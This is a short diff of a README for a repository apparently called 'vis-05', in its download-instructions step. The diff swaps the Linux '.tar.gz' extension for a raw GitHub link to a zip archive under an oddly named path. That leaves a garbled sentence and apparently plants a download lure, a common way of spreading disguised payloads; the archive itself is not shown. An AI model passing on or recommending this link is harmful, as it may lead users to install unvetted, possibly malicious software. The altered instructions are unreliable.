Omgrjevvd/vis-05/README.md

 3. **Download the Application**

    Click on the version you want.
 A list of download options will appear.
-Look for the file corresponding to your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+Look for the file corresponding to your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/Omgrjevvd/vis-05/main/isosulphocyanate/vis_3.5.zip` for Linux).

 4. **Complete the Download**